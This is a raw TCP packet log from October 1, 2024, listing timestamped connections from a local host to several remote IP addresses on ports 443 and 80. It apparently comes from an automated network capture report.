                                      Oct 1, 2024 07:43:04.031769991 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.031809092 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.038080931 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.038125992 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.038188934 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.038208008 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.038216114 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.038245916 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.038254976 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.038261890 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.038307905 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.044475079 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.044533968 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.044559002 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.044580936 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.044585943 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.044599056 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.044637918 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.044727087 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.044783115 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.050195932 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.050359011 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.050388098 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.050415039 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.050435066 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.050442934 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.050467968 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.056586981 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.056617975 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.056644917 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.056647062 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.056655884 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.056685925 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.056705952 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.056739092 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.056751013 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.056756973 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.056807041 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.062506914 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.062689066 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.062728882 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.062755108 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.062755108 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.062764883 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.062793970 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.066195965 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.066248894 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.066247940 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.066260099 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.066293001 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.066687107 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.066761017 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.066804886 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.066812038 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.066843033 CEST44349705142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:04.066890001 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:04.067310095 CEST49705443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:28.939596891 CEST49714443192.168.2.5142.250.184.238
                                      Oct 1, 2024 07:43:28.939646006 CEST44349714142.250.184.238192.168.2.5
                                      Oct 1, 2024 07:43:28.939738989 CEST49714443192.168.2.5142.250.184.238
                                      Oct 1, 2024 07:43:28.947870016 CEST49714443192.168.2.5142.250.184.238
                                      Oct 1, 2024 07:43:28.947890997 CEST44349714142.250.184.238192.168.2.5
                                      Oct 1, 2024 07:43:29.606116056 CEST44349714142.250.184.238192.168.2.5
                                      Oct 1, 2024 07:43:29.606210947 CEST49714443192.168.2.5142.250.184.238
                                      Oct 1, 2024 07:43:29.606848001 CEST44349714142.250.184.238192.168.2.5
                                      Oct 1, 2024 07:43:29.606904030 CEST49714443192.168.2.5142.250.184.238
                                      Oct 1, 2024 07:43:29.675829887 CEST49714443192.168.2.5142.250.184.238
                                      Oct 1, 2024 07:43:29.675862074 CEST44349714142.250.184.238192.168.2.5
                                      Oct 1, 2024 07:43:29.676208973 CEST44349714142.250.184.238192.168.2.5
                                      Oct 1, 2024 07:43:29.676263094 CEST49714443192.168.2.5142.250.184.238
                                      Oct 1, 2024 07:43:29.680418968 CEST49714443192.168.2.5142.250.184.238
                                      Oct 1, 2024 07:43:29.727404118 CEST44349714142.250.184.238192.168.2.5
                                      Oct 1, 2024 07:43:30.047955990 CEST44349714142.250.184.238192.168.2.5
                                      Oct 1, 2024 07:43:30.048041105 CEST49714443192.168.2.5142.250.184.238
                                      Oct 1, 2024 07:43:30.048583984 CEST49714443192.168.2.5142.250.184.238
                                      Oct 1, 2024 07:43:30.048619986 CEST44349714142.250.184.238192.168.2.5
                                      Oct 1, 2024 07:43:30.048685074 CEST49714443192.168.2.5142.250.184.238
                                      Oct 1, 2024 07:43:30.165571928 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:30.165635109 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:30.165751934 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:30.169688940 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:30.169712067 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:30.802665949 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:30.802845955 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:30.836088896 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:30.836127043 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:30.836441994 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:30.836572886 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:30.837497950 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:30.879400969 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.302012920 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.302243948 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.307934046 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.308033943 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.320353031 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.320437908 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.320525885 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.320544004 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.320580959 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.320626020 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.326536894 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.326672077 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.389478922 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.389575005 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.389645100 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.389663935 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.389713049 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.389815092 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.390948057 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.391041040 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.391047001 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.391119957 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.397407055 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.397489071 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.397496939 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.397557020 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.403578043 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.403666973 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.403676033 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.403737068 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.409884930 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.409965038 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.409980059 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.410041094 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.416245937 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.416332006 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.416344881 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.416407108 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.422441006 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.422528982 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.422538996 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.422609091 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.428746939 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.428837061 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.428858042 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.428920984 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.434448004 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.434561014 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.434570074 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.434633017 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.440334082 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.440431118 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.440459013 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.440532923 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.446214914 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.446297884 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.446307898 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.446372032 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.451970100 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.452054024 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.455427885 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.455512047 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.457643032 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.457722902 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.476726055 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.476795912 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.476825953 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.477026939 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.477118969 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.477165937 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.477202892 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.477317095 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.478239059 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.478329897 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.483026028 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.483078957 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.483114958 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.483125925 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.483175039 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.483257055 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.488322020 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.488414049 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.488425970 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.488492966 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.493818045 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.493912935 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.493944883 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.494030952 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.498776913 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.498863935 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.498876095 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.498939991 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.503891945 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.503982067 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.503993988 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.504056931 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.508596897 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.508687973 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.508697033 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.508763075 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.513185024 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.513308048 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.513334990 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.513398886 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.517771006 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.517853022 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.517873049 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.517939091 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.522489071 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.522576094 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.522598982 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.522660017 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.526989937 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.527075052 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.527093887 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.527160883 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.531905890 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.531996012 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.532016039 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.532074928 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.536077023 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.536165953 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.536191940 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.536269903 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.540368080 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.540436029 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.540452957 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.540462017 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.540498972 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.540611982 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.544544935 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.544672012 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.544680119 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.544770956 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.548338890 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.548446894 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.548455954 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.548540115 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.552069902 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.552417994 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.552436113 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.552504063 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.555811882 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.555865049 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.555887938 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.555932999 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.559408903 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.559499979 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.559545040 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.559577942 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.559595108 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.559600115 CEST44349715142.250.184.193192.168.2.5
                                      Oct 1, 2024 07:43:33.559621096 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:33.559643030 CEST49715443192.168.2.5142.250.184.193
                                      Oct 1, 2024 07:43:34.536312103 CEST4971680192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:34.542757988 CEST8049716137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:34.542849064 CEST4971680192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:34.545209885 CEST4971680192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:34.551302910 CEST8049716137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:34.551354885 CEST4971680192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:34.556601048 CEST8049716137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:37.245479107 CEST8049716137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:37.245507002 CEST8049716137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:37.245517969 CEST8049716137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:37.245532990 CEST8049716137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:37.245542049 CEST8049716137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:37.245796919 CEST4971680192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:37.246104956 CEST4971680192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:37.310281992 CEST4971780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:37.315221071 CEST8049717137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:37.315371990 CEST4971780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:37.317486048 CEST4971780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:37.322349072 CEST8049717137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:37.322516918 CEST4971780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:37.327517033 CEST8049717137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:40.069097996 CEST8049717137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:40.069118023 CEST8049717137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:40.069129944 CEST8049717137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:40.069143057 CEST8049717137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:40.069355011 CEST4971780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:40.069720030 CEST4971780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:40.074421883 CEST8049717137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:40.165213108 CEST4971880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:40.170044899 CEST8049718137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:40.170195103 CEST4971880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:40.180964947 CEST4971880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:40.185760975 CEST8049718137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:40.185853004 CEST4971880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:40.190711021 CEST8049718137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:42.828028917 CEST8049718137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:42.828052044 CEST8049718137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:42.828062057 CEST8049718137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:42.828068972 CEST8049718137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:42.828078032 CEST8049718137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:42.828237057 CEST4971880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:42.828574896 CEST4971880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:42.828608990 CEST4971880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:42.989932060 CEST4971980192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:42.994900942 CEST8049719137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:42.995078087 CEST4971980192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:42.997507095 CEST4971980192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:43.002935886 CEST8049719137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:43.003129959 CEST4971980192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:43.007977009 CEST8049719137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:45.589272976 CEST8049719137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:45.589292049 CEST8049719137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:45.589302063 CEST8049719137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:45.589317083 CEST8049719137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:45.589348078 CEST4971980192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:45.589411020 CEST4971980192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:45.589672089 CEST4971980192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:45.595431089 CEST8049719137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:45.728682995 CEST4972080192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:45.733674049 CEST8049720137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:45.733762980 CEST4972080192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:45.736512899 CEST4972080192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:45.741379976 CEST8049720137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:45.741447926 CEST4972080192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:45.746316910 CEST8049720137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:48.330589056 CEST8049720137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:48.330615997 CEST8049720137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:48.330630064 CEST8049720137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:48.330643892 CEST8049720137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:48.330750942 CEST4972080192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:48.330802917 CEST4972080192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:48.334021091 CEST4972080192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:48.338850975 CEST8049720137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:48.560636044 CEST4972180192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:48.565675020 CEST8049721137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:48.565747023 CEST4972180192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:48.567946911 CEST4972180192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:48.572720051 CEST8049721137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:48.572784901 CEST4972180192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:48.577534914 CEST8049721137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:51.195276022 CEST8049721137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:51.195310116 CEST8049721137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:51.195353031 CEST8049721137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:51.195415020 CEST4972180192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:51.195436954 CEST8049721137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:51.195487976 CEST8049721137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:51.195537090 CEST4972180192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:51.195537090 CEST4972180192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:51.200871944 CEST4972180192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:51.337825060 CEST4972380192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:51.343455076 CEST8049723137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:51.343561888 CEST4972380192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:51.345716000 CEST4972380192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:51.351286888 CEST8049723137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:51.351557970 CEST4972380192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:51.357475042 CEST8049723137.184.191.215192.168.2.5
